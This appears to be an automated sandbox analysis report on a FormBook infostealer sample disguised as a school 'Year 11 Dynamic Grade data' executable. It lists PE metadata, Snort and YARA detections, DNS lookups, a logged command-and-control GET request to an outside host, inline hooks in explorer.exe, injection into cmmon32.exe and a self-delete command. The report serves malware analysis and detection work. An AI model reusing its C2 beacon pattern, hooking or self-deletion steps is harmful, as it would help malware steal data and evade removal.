                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x19e5980x53.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a00000xd2f.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a20000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000x19c5f40x19c600False0.497171846582data6.20151324644IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rsrc0x1a00000xd2f0xe00False0.368303571429data4.68496519206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x1a20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_VERSION0x1a00a00x3ecdata
                                  RT_MANIFEST0x1a048c0x8a3XML 1.0 document, UTF-8 Unicode (with BOM) text

                                  Imports

                                  DLLImport
                                  mscoree.dll_CorExeMain

                                  Version Infos

                                  DescriptionData
                                  Translation0x0000 0x04b0
                                  LegalCopyrightCopyright The Ecclesbourne School 2015
                                  Assembly Version1.0.0.0
                                  InternalNameYear 11 Dynamic Grade data.exe
                                  FileVersion1.0.0.0
                                  CompanyNameSCCM2K12
                                  LegalTrademarks
                                  Comments
                                  ProductNameYear 11 Dynamic Grade data
                                  ProductVersion1.0.0.0
                                  FileDescriptionYear 11 Dynamic Grade data
                                  OriginalFilenameYear 11 Dynamic Grade data.exe

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  05/12/21-16:01:12.217029TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970780192.168.2.33.16.197.4
                                  05/12/21-16:01:12.217029TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970780192.168.2.33.16.197.4
                                  05/12/21-16:01:12.217029TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970780192.168.2.33.16.197.4

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 12, 2021 16:01:12.073072910 CEST4970780192.168.2.33.16.197.4
                                  May 12, 2021 16:01:12.209650993 CEST80497073.16.197.4192.168.2.3
                                  May 12, 2021 16:01:12.209789038 CEST4970780192.168.2.33.16.197.4
                                  May 12, 2021 16:01:12.217029095 CEST4970780192.168.2.33.16.197.4
                                  May 12, 2021 16:01:12.353585005 CEST80497073.16.197.4192.168.2.3
                                  May 12, 2021 16:01:12.354059935 CEST80497073.16.197.4192.168.2.3
                                  May 12, 2021 16:01:12.354101896 CEST80497073.16.197.4192.168.2.3
                                  May 12, 2021 16:01:12.354343891 CEST4970780192.168.2.33.16.197.4
                                  May 12, 2021 16:01:12.354446888 CEST4970780192.168.2.33.16.197.4
                                  May 12, 2021 16:01:12.491090059 CEST80497073.16.197.4192.168.2.3

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 12, 2021 15:59:17.559443951 CEST5935353192.168.2.38.8.8.8
                                  May 12, 2021 15:59:17.609463930 CEST53593538.8.8.8192.168.2.3
                                  May 12, 2021 15:59:18.608581066 CEST5223853192.168.2.38.8.8.8
                                  May 12, 2021 15:59:18.660043001 CEST53522388.8.8.8192.168.2.3
                                  May 12, 2021 15:59:19.578691959 CEST4987353192.168.2.38.8.8.8
                                  May 12, 2021 15:59:19.631653070 CEST53498738.8.8.8192.168.2.3
                                  May 12, 2021 15:59:20.499625921 CEST5319653192.168.2.38.8.8.8
                                  May 12, 2021 15:59:20.551640034 CEST53531968.8.8.8192.168.2.3
                                  May 12, 2021 15:59:21.498747110 CEST5677753192.168.2.38.8.8.8
                                  May 12, 2021 15:59:21.547563076 CEST53567778.8.8.8192.168.2.3
                                  May 12, 2021 15:59:22.409842968 CEST5864353192.168.2.38.8.8.8
                                  May 12, 2021 15:59:22.458745003 CEST53586438.8.8.8192.168.2.3
                                  May 12, 2021 15:59:23.316637039 CEST6098553192.168.2.38.8.8.8
                                  May 12, 2021 15:59:23.366002083 CEST53609858.8.8.8192.168.2.3
                                  May 12, 2021 15:59:24.231729031 CEST5020053192.168.2.38.8.8.8
                                  May 12, 2021 15:59:24.280591011 CEST53502008.8.8.8192.168.2.3
                                  May 12, 2021 15:59:25.494689941 CEST5128153192.168.2.38.8.8.8
                                  May 12, 2021 15:59:25.545285940 CEST53512818.8.8.8192.168.2.3
                                  May 12, 2021 15:59:26.535496950 CEST4919953192.168.2.38.8.8.8
                                  May 12, 2021 15:59:26.584317923 CEST53491998.8.8.8192.168.2.3
                                  May 12, 2021 15:59:27.252641916 CEST5062053192.168.2.38.8.8.8
                                  May 12, 2021 15:59:27.305210114 CEST53506208.8.8.8192.168.2.3
                                  May 12, 2021 15:59:27.571415901 CEST6493853192.168.2.38.8.8.8
                                  May 12, 2021 15:59:27.621311903 CEST53649388.8.8.8192.168.2.3
                                  May 12, 2021 15:59:27.779794931 CEST6015253192.168.2.38.8.8.8
                                  May 12, 2021 15:59:27.847409964 CEST53601528.8.8.8192.168.2.3
                                  May 12, 2021 15:59:27.858779907 CEST5754453192.168.2.38.8.8.8
                                  May 12, 2021 15:59:27.919125080 CEST53575448.8.8.8192.168.2.3
                                  May 12, 2021 15:59:28.483575106 CEST5598453192.168.2.38.8.8.8
                                  May 12, 2021 15:59:28.535130978 CEST53559848.8.8.8192.168.2.3
                                  May 12, 2021 15:59:29.406898975 CEST6418553192.168.2.38.8.8.8
                                  May 12, 2021 15:59:29.464296103 CEST53641858.8.8.8192.168.2.3
                                  May 12, 2021 15:59:30.667299032 CEST6511053192.168.2.38.8.8.8
                                  May 12, 2021 15:59:30.716304064 CEST53651108.8.8.8192.168.2.3
                                  May 12, 2021 15:59:31.618115902 CEST5836153192.168.2.38.8.8.8
                                  May 12, 2021 15:59:31.669806004 CEST53583618.8.8.8192.168.2.3
                                  May 12, 2021 15:59:33.399279118 CEST6349253192.168.2.38.8.8.8
                                  May 12, 2021 15:59:33.448721886 CEST53634928.8.8.8192.168.2.3
                                  May 12, 2021 15:59:52.801012039 CEST6083153192.168.2.38.8.8.8
                                  May 12, 2021 15:59:52.863289118 CEST53608318.8.8.8192.168.2.3
                                  May 12, 2021 16:01:11.902173042 CEST6010053192.168.2.38.8.8.8
                                  May 12, 2021 16:01:12.065808058 CEST53601008.8.8.8192.168.2.3
                                  May 12, 2021 16:01:32.535322905 CEST5319553192.168.2.38.8.8.8
                                  May 12, 2021 16:01:32.609401941 CEST53531958.8.8.8192.168.2.3

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  May 12, 2021 16:01:11.902173042 CEST192.168.2.38.8.8.80x5e50Standard query (0)www.iqomw.comA (IP address)IN (0x0001)
                                  May 12, 2021 16:01:32.535322905 CEST192.168.2.38.8.8.80xd4d5Standard query (0)www.elzooz.comA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  May 12, 2021 16:01:12.065808058 CEST8.8.8.8192.168.2.30x5e50No error (0)www.iqomw.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                  May 12, 2021 16:01:12.065808058 CEST8.8.8.8192.168.2.30x5e50No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.16.197.4A (IP address)IN (0x0001)
                                  May 12, 2021 16:01:12.065808058 CEST8.8.8.8192.168.2.30x5e50No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com13.59.53.244A (IP address)IN (0x0001)
                                  May 12, 2021 16:01:12.065808058 CEST8.8.8.8192.168.2.30x5e50No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                  May 12, 2021 16:01:32.609401941 CEST8.8.8.8192.168.2.30xd4d5Name error (3)www.elzooz.comnonenoneA (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • www.iqomw.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.3497073.16.197.480C:\Windows\explorer.exe
                                  TimestampkBytes transferredDirectionData
                                  May 12, 2021 16:01:12.217029095 CEST530OUTGET /crdi/?qZ_l=s5ZBPuXj17fhOA1bx0aCq9ENe7PeNxUER8tsGnybxkKx7jlbiox1QoAzGi7ZgPeOdZ4f&y0Dluf=g480w6JH HTTP/1.1
                                  Host: www.iqomw.com
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  May 12, 2021 16:01:12.354059935 CEST530INHTTP/1.1 404 Not Found
                                  Date: Wed, 12 May 2021 14:01:12 GMT
                                  Content-Type: text/html
                                  Content-Length: 153
                                  Connection: close
                                  Server: nginx/1.16.1
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                  Code Manipulations

                                  User Modules

                                  Hook Summary

                                  Function NameHook TypeActive in Processes
                                  PeekMessageAINLINEexplorer.exe
                                  PeekMessageWINLINEexplorer.exe
                                  GetMessageWINLINEexplorer.exe
                                  GetMessageAINLINEexplorer.exe

                                  Processes

                                  Process: explorer.exe, Module: user32.dll
                                  Function NameHook TypeNew Data
                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE8
                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE8
                                  GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE8
                                  GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE8

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Start time:15:59:24
                                  Start date:12/05/2021
                                  Path:C:\Users\user\Desktop\New-Order 04758485.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\New-Order 04758485.exe'
                                  Imagebase:0x540000
                                  File size:1693696 bytes
                                  MD5 hash:ED4361A7909FC65A189B4ADAAC292991
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.307323456.0000000003AFA000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.307802950.0000000003BDE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.307176477.0000000003A97000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  General

                                  Start time:16:00:06
                                  Start date:12/05/2021
                                  Path:C:\Users\user\Desktop\New-Order 04758485.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\New-Order 04758485.exe
                                  Imagebase:0xa70000
                                  File size:1693696 bytes
                                  MD5 hash:ED4361A7909FC65A189B4ADAAC292991
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.342372255.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.342960367.00000000011A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.342980918.00000000011D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  General

                                  Start time:16:00:11
                                  Start date:12/05/2021
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:
                                  Imagebase:0x7ff714890000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:16:00:26
                                  Start date:12/05/2021
                                  Path:C:\Windows\SysWOW64\cmmon32.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                  Imagebase:0xe60000
                                  File size:36864 bytes
                                  MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.474310455.0000000004920000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.474480183.0000000004950000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.472057276.0000000000C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:moderate

                                  General

                                  Start time:16:00:29
                                  Start date:12/05/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:/c del 'C:\Users\user\Desktop\New-Order 04758485.exe'
                                  Imagebase:0xb90000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:16:00:30
                                  Start date:12/05/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6b2800000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  Code Analysis

                                  Reset < >